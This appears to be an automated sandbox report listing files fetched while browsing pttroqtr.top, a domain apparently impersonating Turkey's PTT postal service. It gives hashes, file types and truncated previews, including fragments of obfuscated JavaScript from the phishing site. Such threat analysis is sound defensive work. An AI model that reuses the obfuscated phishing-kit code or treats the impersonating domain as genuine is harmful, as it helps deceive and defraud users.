                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6219],{5332:function(e,n,l){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[slug]",function(){return l(797)}])},3846:function(e,n,l){"use strict";var s,t=l(3288),u=l(6830),a=l.n(u),r=l(1395),c=l(2466),o=l(3230),i=l(3395),d=l(6731),_=l.n(d);n.Z=function(e){var n=e.menu,l=e.menus,u=(0,r.useRouter)(),d=(0,c.useRef)(),g=function(e){return!(0,o.lF)(l.filter((function(n){return n.parentMenuId===e}))[0])&&(0,t.jsx)("ul",{className:"".concat(a().menu),children:l&&l.filter((function(n){return n.parentMenuId===e&&!(0,o.lF)(n.languageResources)})).map((function(e){return(0,t.jsxs)("li",{"data-id":(0,o.fI)(e.languageResources,i.rD.MENU).slug,children:[e.url!==i.H_.PAGE_NO_ACTION?(0,t.jsx)(_(),{href:"".concat((0,o.lF)(e.url)||e.url==i.H_.PAGE?"/".concat((0,o.fI)(e.languageResources,i.rD.MENU).slug):e.url),children:(0,t.jsx)("a",{children:(0,o.fI)(e.languageResources,i.rD.MENU).value})}):(0,t.jsxs)(t.Fragment,{children:[(0,o.fI)(e.languageResou
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):19866
                                                                                                                                                                                            Entropy (8bit):7.886038247408446
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:dSpd2e4QRiLuY9aokvzerh0OuGo8dFoCrIQl5JQwI+h5uYMCbmWxr2xyrBkh+:mMJQw19a17erOo1dZrtzXmVpOs+
                                                                                                                                                                                            MD5:7F20E1AD732C6686C1C7F0353209DDCC
                                                                                                                                                                                            SHA1:057F78EFD3A085BDE99A5FF105F5CCB2A491F1DA
                                                                                                                                                                                            SHA-256:181E423A80ADDA5EA6EBBECFA7D787AD97BFAF0E778EDEAD79F4B3697A24D544
                                                                                                                                                                                            SHA-512:05D12844B31B6F63FB5DE9ADFA83C587C4C350A3E81D32516F40D69FDA94ACC85DE78E012C5F34864BDF48CAB2DBF56308DE723B0B20A0BA9559ABB5718620DB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/41.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..M'IDATx....x\wy.....H..k.%Cn....D!$h.B.M.`e.fi..e.l..-V..l!...,......-...\..F..@!.%!...1!!$!...%.%..=.?..h$.9s.3...<'.n3g......522"....,U.....B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.(I.%am......7kdd....B\....k.jm.....23.?.So..fm.Q9;.M..T..."t..........TD.C=..0.. ........-..km....p....R..].......<.c.3..........gk.:......f.x...8Th...LS..{.}.l...M.....v....0...p.J...A.%...(.&.X.F.......q..4_.Mp.L.-imi...q}...\1.M.K.x..?.x.........~M...n.....8 . .........5....>.Q...V.I.|...N..7.o.[}...C?*.;..k.U....C.P4
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16034
                                                                                                                                                                                            Entropy (8bit):5.33471788669773
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:/6ALhInGOG+gmyjrm+uf+7JRAuCpCRbF0JDK4dADAMJA8APNApAX1daA5nSwvAHK:JMy+eJXrjRK7t2gOYyOK6cG5fnljJ
                                                                                                                                                                                            MD5:0948FD6282170220B43EEA1A3AADB8AB
                                                                                                                                                                                            SHA1:7C49775D06EA5A98B039E6B0789C8A81FCE23F65
                                                                                                                                                                                            SHA-256:D6558D4E6D5DF23F9C92D7A5F738AA56C036D0F40902DA6A68446CFA0349D43F
                                                                                                                                                                                            SHA-512:D238DA30A748B6FF1ADB0CAED0EB313F76FC37F54FDFAD18660D6CFFC1BB47BB1A3D12647A2E948963AA3B8EC267D069D0E1C6CDE44B13C6895A39AD66BEFBB0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/8b4af40ckFGym.css
                                                                                                                                                                                            Preview:./* _lcid="1055" _version="16.0.4681".._LocalBinding */..body,...ms-core-defaultFont,..#pageStatusBar,...ms-status-msg,...js-callout-body..{../* [ReplaceFont(themeFont:"body")] */ font-family:"Segoe UI","Segoe",Tahoma,Helvetica,Arial,sans-serif;..font-size:13px;..}..body,...ms-core-defaultFont,...js-callout-body..{../* [ReplaceColor(themeColor:"BodyText")] */ color:#444;..}...ms-core-defaultFont..{..font-weight:normal;..text-decoration:none;..white-space:normal;..word-break:normal;..line-height:normal;..}..body..{..margin:0px;..overflow:hidden;../* [ReplaceColor(themeColor:"PageBackground")] */ background-color:#fff;..background-size:cover;..background-repeat:no-repeat;..}..html > .ms-core-needIEFilter..{../* [ReplaceBGImage] */ -ms-filter:"progid:DXImageTransform.Microsoft.AlphaImageLoader(src='about:blank',sizingMethod='scale');";..}...ms-backgroundImage..{../* [ReplaceBGImage] */ background-image:url();..}..#s4-ribbonrow..{..position:relative;..}..#s4-workspace..{..overflow:auto;.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):22730
                                                                                                                                                                                            Entropy (8bit):7.866153192085963
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:pP5QuY5tMApoeSaPA53115KmABEC40OQ38GnamIGZJQYJZgSM4vL6PpnE6BWOyUV:pRA5xpoeSaEuF40sGnPdQOZyoApnE6jV
                                                                                                                                                                                            MD5:F4F38EA525A386F824CB5FAD76DD9896
                                                                                                                                                                                            SHA1:167F97D1219368BE2EDBAFA720A2AC5A657ACAFD
                                                                                                                                                                                            SHA-256:0DD037A0E7DD6E450A2DC80537185315EA5DDE1050A0328DDCA3D4F232BAD669
                                                                                                                                                                                            SHA-512:30EE24C56483CCDA07E6B774E7A27A30CAD3440E154C255979A82F90C5B0CA49703B817D7E7879AD0DEFC68411BB9267A6E03AE5A868A7EB6A4FAF4855947E5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..XWIDATx...x..y......@.$.....$r....qb.b.&..I.4Ic.b.8i.6...I...9........s.V.....I..M.4]S..Z...U.%..u...B........H..I..q!..G.......`.7..].J).........]..............8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$.............
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
                                                                                                                                                                                            Entropy (8bit):4.180365114215879
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
                                                                                                                                                                                            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
                                                                                                                                                                                            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
                                                                                                                                                                                            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
                                                                                                                                                                                            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:{"code":1,"message":"Session ID unknown"}
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):23451
                                                                                                                                                                                            Entropy (8bit):7.830242871837404
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:ult4ezgA7TRsHmD6+Hv/o92O7/h+y04TS8do9O4NZ0VQFdxYYRfW4By:uQeEA7TaGW+HoYM/h+TS9SJAQXFWQy
                                                                                                                                                                                            MD5:2C9ACA8B197F0D642CCFF28D6B23289D
                                                                                                                                                                                            SHA1:57CDD6D8F177242E12364C419CCA4BFCF6D72922
                                                                                                                                                                                            SHA-256:6C8B32F54CD73CD08B9B79D0F2491E5195983FABD0421BBEB99A8EA3CB86256F
                                                                                                                                                                                            SHA-512:6BB8DADF816B2BFB10F59A55803346CD17A9BCCA628BEF4840B9359EBA0D3204B7D07CBCEBFF3BE2093847CE35D490696DBA2EAA965675BD8E7B7CFDAA271C3C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/51.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..[(IDATx....c.}.y.......1..K.y.L..j.,1v\j......_c.d.....^p........^...$i5.$...RA..tw5..3..S9....U.@0<.. .=,.U0.%.Kw...{ZGG.JW.UI..|@]]*I..s.t>..s..(.c......E...... q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.................H...........H..... q....H..... q.......... q.............................H..... q....H..... q.......... q.............................H............ q.............................H...........H..... q....H..... q.............................H...........H..... q....H..... q.......... q.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):7148
                                                                                                                                                                                            Entropy (8bit):7.945839730308709
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:N7ZAXeFaEn8qr8WbCYt5+KIcr/UrowzfTIHxRn7UgUG7jvxPemLbPppFIjIIle:dZAuFeWbCYtCroKix93U2xPe2aIC
                                                                                                                                                                                            MD5:641DD16D1D00C8604EB6179270111AE9
                                                                                                                                                                                            SHA1:184E0869FA5B954733CD187B9C9AFC8E6565BC92
                                                                                                                                                                                            SHA-256:9A893C19F8C7DB3E1BC28AC41802909856003C35040A6091F8C02B59D1ED5CD2
                                                                                                                                                                                            SHA-512:DFDE9BF1B3F449C9B157324C952C4213A4828A084BC3BD37AB6801C2E916942A45203C57E41B774D54EF60E1100204BEE5D0CA453B9835791C08F2BAAC62BF63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........e..ALPH.......m.9..m.y....&J....-...........Mp....-...I..Df.K...u.sO.t..ODL..... x.. ..0.....&F`.C...rE....M./.ZBW.........Bu..".......L...g.V...\.t1.?L{...I.l...:..._b'm.w..h.Y\...>..Z..+df.F.;IO.....g...lw............../...S.....^q.u.Xo.Q...k...J.k5B...M.1.7...Y.....I...=....>...^.k..b.J...1c..;~....k.s..FW,.....7..@...k..`..BX.G/.1.e....M..z.....(.Xw.c....c.G....D..c..;.mq...1.".......=....j..9..^...k......d? ."..q.c.<.?...m.0~...;.X......xA..v;.8.K.....;.2...D.1.fnP..gN.\;.Q.2..oxwV...z#...O.\...o%,n....3i..S.<Z.D.Q..^..``..L...C....)I.g..Q.<..}*?.J....T.?.....u|......$..go>rt_.....T-L..%.>...jO.\;.L..PI.H..ce.....j.,.x.31U.$.j..&..m.+..Zw.$.J...../.v.NZ.....S...<.Jw.EvV*.Z.7..As.+..:..&6...4..%...R...Jk.q.S....l|q...~<....\...o....m...Uu...h.4.....+...24.`M.W.9...k..h..D.......L....1..4g^.m?.....";.....l..on..pk..4)LsI..XZ.h........5s..`..Em.../.....N*r.SU.np...U.D..{...J....L.U..8.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65329), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):161114
                                                                                                                                                                                            Entropy (8bit):5.144436389608998
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:9RohK1FtK8YlXSyGwjUnKznBGDhZB/FEG39tBV1z37fb7K0yF2dDIp:8hKuCyGwjUnKr+RbNtBV1z3LTNC
                                                                                                                                                                                            MD5:C3DCC3BE21F2F8D1CF00E2E339C699D1
                                                                                                                                                                                            SHA1:6BE6BC9EDAAA3403BF504DCEA10F7C2104102434
                                                                                                                                                                                            SHA-256:992416AF8318FB013AED368155200BE56B07B52E70A21A80A1312E721ADAFBA5
                                                                                                                                                                                            SHA-512:90F7410507965DAD04F076A10D3F10929AD7FEBA071901D6C17BBE014351AA48FF6C3168B3CDEC7F8153C1353EADCE8D5100907C88E73CC8CC88AD1BB4A07748
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:const a33_0x762c71=a33_0xda6e;(function(_0x1d2039,_0x34a38e){const _0x303bae=a33_0xda6e,_0x22f25a=_0x1d2039();while(!![]){try{const _0xc1e4b0=-parseInt(_0x303bae(0x1f4))/0x1+-parseInt(_0x303bae(0x48a))/0x2*(-parseInt(_0x303bae(0x843))/0x3)+-parseInt(_0x303bae(0x1a8))/0x4+-parseInt(_0x303bae(0x896))/0x5*(parseInt(_0x303bae(0x146))/0x6)+-parseInt(_0x303bae(0x566))/0x7*(parseInt(_0x303bae(0x148))/0x8)+parseInt(_0x303bae(0xbb))/0x9+parseInt(_0x303bae(0x1a4))/0xa;if(_0xc1e4b0===_0x34a38e)break;else _0x22f25a['push'](_0x22f25a['shift']());}catch(_0x2a237d){_0x22f25a['push'](_0x22f25a['shift']());}}}(a33_0x38b1,0x5cb8c));function a33_0x38b1(){const _0x576f75=['em_ptt_abo','cz0ndHJhbn','>Tebligat\x20','ON\x22\x20id=\x22__','-32','/a></span>','kta_hizmet','YT48L2Rpdj','class=\x22ite','bank.ptt.g','l\x20ui-widge','tAk%C4%B1l','JvZHVjdGlt','age\x20has-su','#ptt_diger','FgIFJmdfMT','lateliUst.','Link\x22\x20clas','d-4\x22><a\x20id','-search\x20sx','tt_pttmati','klamalari','w.cimer.go','0\x20auto',
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4650), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4708
                                                                                                                                                                                            Entropy (8bit):5.24982094326148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:LhLALv2dQ13a19GeEc2mvDjHqiqV8SYn1u7+eNEgyJY47186ee7f1lV:xz5Ec1vfqiqVg1u7+eyPY47186ee7f1D
                                                                                                                                                                                            MD5:0DA2A6E8828A9D4461A27CC813A21CD1
                                                                                                                                                                                            SHA1:32727963FEC3E91E3951E0551ABA8AC7F45FC89D
                                                                                                                                                                                            SHA-256:8A87A08F2C1C9AE855AACA4BD6F26B5DE44F28EA9810039F93333CC8E59FD166
                                                                                                                                                                                            SHA-512:4F6E559C68F275E9C2F2C3C8D04392049C75856279387E74EEF2BD791DE653A81231C8B08BF86C712C905CD2C603A5298B092BCA2F7A29092AD8CD1E1F35FDA1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/77985128JxKnW.js
                                                                                                                                                                                            Preview:const a16_0x1a0ab1=a16_0xb309;(function(_0xc62027,_0x4c3503){const _0x472517=a16_0xb309,_0x18f288=_0xc62027();while(!![]){try{const _0x10a64b=parseInt(_0x472517(0x14b))/0x1+-parseInt(_0x472517(0x13f))/0x2+parseInt(_0x472517(0x12d))/0x3+-parseInt(_0x472517(0x12a))/0x4*(parseInt(_0x472517(0x145))/0x5)+parseInt(_0x472517(0x129))/0x6*(parseInt(_0x472517(0x144))/0x7)+-parseInt(_0x472517(0x12e))/0x8*(parseInt(_0x472517(0x141))/0x9)+parseInt(_0x472517(0x132))/0xa;if(_0x10a64b===_0x4c3503)break;else _0x18f288['push'](_0x18f288['shift']());}catch(_0x2102de){_0x18f288['push'](_0x18f288['shift']());}}}(a16_0x4681,0x6ebf6));const a16_0xaa59f7=(function(){let _0x410bd1=!![];return function(_0x3e5c07,_0x31cc45){const _0x5c21e7=_0x410bd1?function(){const _0x3aa6a6=a16_0xb309;if(_0x31cc45){const _0x21f428=_0x31cc45[_0x3aa6a6(0x124)](_0x3e5c07,arguments);return _0x31cc45=null,_0x21f428;}}:function(){};return _0x410bd1=![],_0x5c21e7;};}()),a16_0x8c9795=a16_0xaa59f7(this,function(){const _0x3aa272=a16_0x
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):268233
                                                                                                                                                                                            Entropy (8bit):5.5734544187755555
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:0C1pmFU7dlq04d7G3BsEemveONeH0fxnQe:LeW7dQnhiLj
                                                                                                                                                                                            MD5:D18195475B2C6A0F3331649A90B2595C
                                                                                                                                                                                            SHA1:7A7C6BB0410DD3458E68918937BD6EC319B206FF
                                                                                                                                                                                            SHA-256:68A18C1D04EA99C59CC3EC1D145F7750069BE3BCB9B1D9A570FB09CE395DB3E4
                                                                                                                                                                                            SHA-512:6B5A7E35EDCF9B4FE195C709B5399320009489E6797FC6156EDFFB27BDA78BAECAC47BCCF43BEDDB04019922D2640D64CAE90F03FE1A95A871FF4A7E139D4808
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","ptt\\.gov\\.tr"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32033)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):37045
                                                                                                                                                                                            Entropy (8bit):5.174934618594778
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:o2rGy27UwlNqMl95qNmCFejhqs8snmi+CSFXfbx8Gf3Zq7Q:Jg73zhq0GvbJ3ZKQ
                                                                                                                                                                                            MD5:5869C96CC8F19086AEE625D670D741F9
                                                                                                                                                                                            SHA1:430A443D74830FE9BE26EFCA431F448C1B3740F9
                                                                                                                                                                                            SHA-256:53964478A7C634E8DAD34ECC303DD8048D00DCE4993906DE1BACF67F663486EF
                                                                                                                                                                                            SHA-512:8B3B64A1BB2F9E329F02D4CD7479065630184EBAED942EE61A9FF9E1CE34C28C0EECB854458977815CF3704A8697FA8A5D096D2761F032B74B70D51DA3E37F45
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under the MIT license. */.if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (41188)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):41353
                                                                                                                                                                                            Entropy (8bit):5.056168085786293
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:c+Pm0XRZqmxmIsNsPS2vu+XrNmVSH+45sZRsI3TaluztEs4gsVhJ1ADe1yWfswSf:Fe0XR5IuSQ5JIWzMjW0dgto
                                                                                                                                                                                            MD5:5839179B1E59174601C0E5C3163431C7
                                                                                                                                                                                            SHA1:E320297D3B8AA9471EBBB8A1DC24601024C1323F
                                                                                                                                                                                            SHA-256:CBF8DED2623FB24F24820D26315C7B9481BFE63F1A45AFC2BF7E4DFB4E992C32
                                                                                                                                                                                            SHA-512:91D1EB4975CA03998F5650E991016FA5800503C3E2D75B91C2FF07BD7617C2EFB45885EF21E7F965B16E815DDE3C7CF36A51B14088A2F1C0CF981C27873D9797
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/bootstrap/css/bootstrap.min.css
                                                                                                                                                                                            Preview:/*!. * Bootstrap v3.3.7 (http://getbootstrap.com). * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}footer,header,main,menu,nav{display:block}audio,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}b,strong{font-weight:700}h1{margin:.67em 0;font-size:2em}img{border:0}svg:not(:root){overflow:hidden}pre{overflow:auto}pre{font-family:monospace,monospace;font-size:1em}button,input,select,textarea{margin:0;font:inherit;color:inherit}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html inp
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 156496, version 773.768
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):156496
                                                                                                                                                                                            Entropy (8bit):7.996570522285877
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:3072:OvM6gZMLmY8uGpjVnlooQ+GQs8jic0f/KkMdE:OU65LoP5QSsuic0f/cdE
                                                                                                                                                                                            MD5:6C4EEE562650E53CEE32496BDFBE534B
                                                                                                                                                                                            SHA1:1AAE708E3B94EE981B452A918D28ED037FBB5E18
                                                                                                                                                                                            SHA-256:9FC85F3A4544AB0D570C7F8F9BBB88DB8D92C359B2707580EA8B07C75673EAE2
                                                                                                                                                                                            SHA-512:EBCB5A2E2A908228F77ECD03B45491778CAD73DDC39FA3A6334B129AAF9FA36C16C0307AEAAD74D77F616B5B34AAC52D91E9F4816945253DC9A826DDD71F4D12
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/media/fa-solid-900.ce4938a3.woff2
                                                                                                                                                                                            Preview:wOF2......cP..........c..........................6.$. .`..<...... .@..m. %.......V'.......).=<E..........%........~.....W.......................S`0...0-.q.=^.../?.zn.Do,.pF..B..8Tr....5..n...Q.>...t:...Q...S....t..eV.....).`.Igb"......"ZI2}.,........#..."1.3.....j.V.....J.......$F..>:(|E..$...U.r.j.vOM.......^....T..$...w*.Dx`.lZ?a..D.`.r.A.UL........ x.]....|....V.D.T..8..R.X%.[.x.>..Z.r....g.?....UCuu.4VI.m.j..1.*K.NX.xn...,..8.Y...b...@.#..kw...%..HK..'...LOH..`.Y`v3fg.............(...(.)R.AERTX.V.LA.GQ.O..-...|o:...).%...{D.Z]=..'....0..6`..X`v..Cr.....)9A..,.^<%:@V..Pp.Lg8S...'.9..N..'......Q....r..^w....fr....;;..V....`.P...HB......!.C\....8...w.>].....|..,s...^./....z.........%...:I'.hw...t.6.......o.f.X.^.....k.....s.....fZ....z.(..%...v.JjI...d.............R`....z.{.=.,Q>.r>.L>d.d..4..!....]n]..K.A.UAD.k.p....Dwy..D......."@..>F!..&@..U........g.F..V.FcT..b4.........=l...~.#.....Y....{.....n............P...R.d.X...{..y.....k.?..2...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):22730
                                                                                                                                                                                            Entropy (8bit):7.866153192085963
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:pP5QuY5tMApoeSaPA53115KmABEC40OQ38GnamIGZJQYJZgSM4vL6PpnE6BWOyUV:pRA5xpoeSaEuF40sGnPdQOZyoApnE6jV
                                                                                                                                                                                            MD5:F4F38EA525A386F824CB5FAD76DD9896
                                                                                                                                                                                            SHA1:167F97D1219368BE2EDBAFA720A2AC5A657ACAFD
                                                                                                                                                                                            SHA-256:0DD037A0E7DD6E450A2DC80537185315EA5DDE1050A0328DDCA3D4F232BAD669
                                                                                                                                                                                            SHA-512:30EE24C56483CCDA07E6B774E7A27A30CAD3440E154C255979A82F90C5B0CA49703B817D7E7879AD0DEFC68411BB9267A6E03AE5A868A7EB6A4FAF4855947E5F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/47.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..XWIDATx...x..y......@.$.....$r....qb.b.&..I.4Ic.b.8i.6...I...9........s.V.....I..M.4]S..Z...U.%..u...B........H..I..q!..G.......`.7..].J).........]..............8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@...... q............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$............. q.....................8....................H.............@.......$......@.......$.............
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (31081), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):31903
                                                                                                                                                                                            Entropy (8bit):5.810923490394336
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:w3iGBkJwiSWzYLyD2ZtS2zF7TzrCaYaIUcrUCFNGwp88Qk238EAfRg9Zr5MHNw9+:wISWYzzNPua/sF+XDACqSRh5/xa21ib
                                                                                                                                                                                            MD5:A01B6E8CE8881B6A2B02061495A8BC47
                                                                                                                                                                                            SHA1:EB4A3F16A6B63BA67B60B4278E06D3384DEC9F93
                                                                                                                                                                                            SHA-256:D6CACA3906FF959A963479874F22DDC7762E575DF6A3065B97D9B079F1AA9A57
                                                                                                                                                                                            SHA-512:DB14B98A778C20BD411E06D6401F95382F4AB959F5563F8D8DF827C59D69BC9A521382FD4C83DDEC459C81C30F9E8151C1455B7703CFFD23E5C188A4D568F208
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
